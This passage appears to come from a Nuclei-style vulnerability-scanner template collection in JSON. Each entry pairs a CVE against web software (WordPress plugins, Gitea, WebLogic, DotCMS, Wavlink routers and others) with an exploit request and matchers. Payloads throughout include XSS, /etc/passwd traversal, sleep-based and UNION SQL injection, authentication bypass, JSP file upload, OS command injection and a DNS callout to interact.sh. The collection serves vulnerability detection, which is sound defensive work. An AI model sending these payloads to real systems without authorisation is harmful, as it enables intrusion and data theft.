\"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31879","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","duration_2 - duration_1 >= 7","contains(content_type_2, \"text/html\")","contains(body_2, \"Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27927","info":{"name":"Microfinance Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1058","info":{"name":"Gitea <1.16.5 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: redirect_to=//interact.sh\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["//interact.sh"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-43769","info":{"name":"Hitachi Pentaho Business Analytics Server - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["false"]},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2022-0206","info":{"name":"WordPress NewStatPress <1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nsp_search&what1=%27+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)\")","contains(body_2, \"newstatpress_page\")"],"condition":"and"}]}]},{"id":"CVE-2022-29004","info":{"name":"Diary Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /edms/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlogindetail={{username}}&userpassword={{password}}&login=\n","POST /edms/search-result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearchdata=<script>alert(document.domain);</script>\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \"<script>alert(document.domain);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30513","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?page=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32770","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?toast=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["text: \"</script><script>alert(document.cookie);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-26352","info":{"name":"DotCMS - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/content/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3\n\n--------------------------aadc326f7ae3eac3\nContent-Disposition: form-data; name=\"name\"; filename=\"../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/{{randstr}}.jsp\"\nContent-Type: text/plain\n\n<%\nout.println(\"CVE-2022-26352\");\n%>\n--------------------------aadc326f7ae3eac3--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"CVE-2022-26352\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-1168","info":{"name":"WordPress WP JobSearch <1.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(domain)>","wp-jobsearch"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<option value=\\\"([0-9]+)\\\""],"internal":true}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-2546","info":{"name":"WordPress All-in-One WP Migration <=7.62 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, '{\\\"new_value\\\":[\\\"XSSPAYLOAD<svg onload=alert(document.domain)>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"secretkey","group":1,"regex":["ai1wm_feedback\"},\"secret_key\":\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-34046","info":{"name":"WAVLINK WN533A8 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /sysinit.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0434","info":{"name":"WordPress Page Views Count <2.4.15 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31980","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Control Teams\")"],"condition":"and"}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0869","info":{"name":"nitely/spirit 0.12.3 - Open 